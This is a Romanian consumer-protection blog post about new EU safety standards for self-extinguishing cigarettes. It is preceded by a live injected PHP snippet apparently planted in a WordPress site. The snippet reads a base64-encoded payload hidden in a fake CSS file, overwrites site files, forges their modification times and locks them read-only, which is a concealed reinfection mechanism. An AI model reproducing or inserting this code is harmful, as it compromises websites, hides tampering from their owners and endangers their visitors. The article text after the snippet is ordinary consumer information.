$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Protectia-Consumatorilor.ro-o9atitudine! te informeaza despre noile standarde europene privind tigaretele – O noua atitudine

Dovezile arata ca numarul de decese poate fi redus cu peste 40 % prin introducerea tigarilor cu „capacitate redusa de incendiere”. Aceasta inseamna tigarete care se sting automat cand sunt lasate nesupravegheate si care, in consecinta, sunt mai putin susceptibile sa provoace un incendiu. Aceasta masura de siguranta este deja practicata in unele tari precum SUA, Canada, Australia si in UE,  in Finlanda, din aprilie 2010.         
           Astfel, de astazi, 17 noiembrie, odata cu publicarea noilor standarde de siguranta in Jurnalul Oficial al Uniunii Europene, toate tigarile vandute in Europa vor trebui să fie conforme cu noile masuri.

            Fii un consumator informat!
          Schimbarea aceasta, care este in conformitate cu noile standarde, se refera la reducerea capacitatii de incendiere care reprezinta capacitatea unei tigari lasate nesupravegheate de a declansa un incendiu. Fabricantii de hartie pentru tigari si-au schimbat productia de hartie in sensul introducerii a doua inele din hartie mai groasa in doua puncte de-a lungul tigarii. Daca tigara este lasata nesupravegheata, tutunul care arde ajunge la unul dintre aceste inele si ar trebui atunci sa se stinga pentru ca inelul restrange alimentarea cu aer/oxigen. O tigara de acest fel reduce timpul de ardere, micsorand astfel sansa de a aprinde mobila, lenjeria de pat sau alte materiale.
           Mai mult, Comisarul UE pentru Sanatate si Consumatori, John Dalli, a declarat: „Nu exista tigara sigura si, evident, cel mai sigur este să nu fumezi deloc! Dar, daca oamenii aleg sa fumeze, noile standarde care urmeaza sa intre pe deplin in vigoare vor obliga companiile de tutun sa produca numai tigari cu capacitate redusa de incendiere si vor proteja, potential, sute de cetateni fata de acest pericol de incendiu.”
          In acelasi comunicat este precizat ca exista date din Statele Membre care acopera perioada din 2003 pana in 2008 si care arata ca, in UE, din cauza tigarilor se produc peste 30 000 de incendii in fiecare an, cu peste 1 000 de decese si peste 4 000 de vatamari. Experienta din Finlanda, unde numarul de victime ale incendiilor declansate de la tigari a scazut cu 43 %, sugereaza ca aproape 500 de vieti ar putea fi salvate in UE, in fiecare an.
          Trebuie subliniat faptul ca tutunul reprezinta cel mai important risc pentru sanatate si care se estimeaza ca provoaca moartea a peste jumatate de milion de oameni in UE in fiecare an. Comisia isi reafirma angajamentul fata de o „Europa fara fum de tigara” si abordeaza aceasta chestiune prin intermediul campaniei sale actuale la nivelul UE .

          Ajuta-ne sa te ajutam!
         Ia atitudine! Apara-ti drepturile si fa o reclamatia ori de cate ori intampini o problema, pe site-ul www.protectia-consumatorilor.ro, Sectiunea Reclamatii  sau direct pe adresa de e-mail reclamatii@protectia-consumatorilor.ro. Luarea de atitudine prin realizarea unei sesizari inseamna o participare activa la schimbarea atitudinii dintr-un cetatean pasiv intr-unul activ si ridicarea societatii romanesti la  standarde europene

By o9admin